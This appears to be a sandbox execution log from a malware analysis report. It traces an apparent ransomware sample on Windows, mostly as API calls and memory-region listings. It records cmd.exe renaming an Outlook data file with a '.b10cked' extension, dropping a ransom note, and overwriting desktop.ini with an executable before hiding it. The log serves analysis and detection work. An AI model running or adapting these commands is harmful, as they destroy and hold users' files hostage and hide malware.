[0237.416] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0237.416] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="VER") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="START") returned -6 [0237.417] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0237.417] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0237.417] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0237.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0237.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0237.418] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0237.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0237.419] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0237.419] _wcsicmp (_String1="FEASF@~1.PST", _String2=".") returned 56 [0237.419] _wcsicmp (_String1="FEASF@~1.PST", _String2="..") returned 56 [0237.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@~1.pst")) returned 0x2020 [0237.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x111e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", nBufferLength=0x104, lpBuffer=0x30ed34, lpFilePart=0x30ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", lpFilePart=0x30ed1c*="FEASF@~1.PST") returned 0x2f [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1")) returned 0x10 [0237.420] _wcsicmp (_String1="FEASF@~1.PST", _String2=".") returned 56 [0237.420] _wcsicmp (_String1="FEASF@~1.PST", _String2="..") returned 56 [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@~1.pst")) returned 0x2020 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", nBufferLength=0x104, lpBuffer=0x30f1b0, lpFilePart=0x30ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", lpFilePart=0x30ef48*="FEASF@~1.PST") returned 0x2f [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] SetErrorMode (uMode=0x0) returned 0x0 [0237.420] SetErrorMode (uMode=0x1) returned 0x0 [0237.420] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", nBufferLength=0x104, lpBuffer=0x30f3b8, lpFilePart=0x30ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", lpFilePart=0x30ef48*="feasf@efw.com.pst.b10cked") returned 0x3c [0237.420] SetErrorMode (uMode=0x0) returned 0x1 [0237.420] SetLastError (dwErrCode=0x0) [0237.420] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst.b10cked")) returned 0xffffffff [0237.421] GetLastError () returned 0x2 [0237.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", fInfoLevelId=0x1, lpFindFileData=0x30e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e8c4) returned 0x100ed0 [0237.421] FindNextFileW (in: hFindFile=0x100ed0, lpFindFileData=0x30e8c4 | out: lpFindFileData=0x30e8c4) returned 0 [0237.421] GetLastError () returned 0x12 [0237.421] FindClose (in: hFindFile=0x100ed0 | out: hFindFile=0x100ed0) returned 1 [0237.422] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST", fInfoLevelId=0x1, lpFindFileData=0x111c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x111c20) returned 0x100ed0 [0237.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", nBufferLength=0x104, lpBuffer=0x30eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked", lpFilePart=0x0) returned 0x3c [0237.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst", nBufferLength=0x104, lpBuffer=0x30eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x34 [0237.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst")) returned 0x2020 [0237.422] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\outloo~1\\feasf@efw.com.pst.b10cked"), dwFlags=0x3) returned 1 [0237.423] FindClose (in: hFindFile=0x100ed0 | out: hFindFile=0x100ed0) returned 1 [0237.423] _vsnwprintf (in: _Buffer=0x4a855040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30eb10 | out: _Buffer=" 1") returned 9 [0237.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.423] GetFileType (hFile=0x7) returned 0x2 [0237.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0237.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ea9c | out: lpMode=0x30ea9c) returned 1 [0237.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ead0 | out: lpConsoleScreenBufferInfo=0x30ead0) returned 1 [0237.462] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0237.462] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x30eb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0237.462] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a864640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eaf4, lpReserved=0x0 | out: lpBuffer=0x4a864640*, lpNumberOfCharsWritten=0x30eaf4*=0x1a) returned 1 [0237.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.462] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.463] SetConsoleInputExeNameW () returned 0x1 [0237.463] GetConsoleOutputCP () returned 0x1b5 [0237.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.463] exit (_Code=0) Process: id = "653" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35860 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35861 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35862 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35863 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35864 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35865 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35866 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35867 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35868 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35869 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35904 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35905 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35906 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35907 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35908 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 35909 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35910 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35911 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35912 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35913 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35914 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35915 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35916 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35917 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35918 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 35919 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35920 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 894 os_tid = 0xf7c Process: id = "654" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35870 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35871 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35872 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 35873 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 35874 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35875 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35876 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35877 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35878 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 35879 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35921 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35922 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35923 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35924 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 35925 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 35926 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 35927 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35928 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35929 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35930 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35931 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35932 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35933 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35934 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35935 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35936 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35937 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 35938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 895 os_tid = 0x458 Thread: id = 896 os_tid = 0xa0c Process: id = "655" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16220" os_pid = "0x43c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "339" os_parent_pid = "0x3e8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c83d" [0xc000000f], "LOCAL" [0x7] Region: id = 35940 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35941 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35942 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35943 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35944 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35945 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35946 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 35947 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35948 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 35949 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 35950 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 35951 start_va = 0x120000 end_va = 0x19ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 35952 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 35953 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35954 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 35955 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 35956 start_va = 0x300000 end_va = 0x3c7fff entry_point = 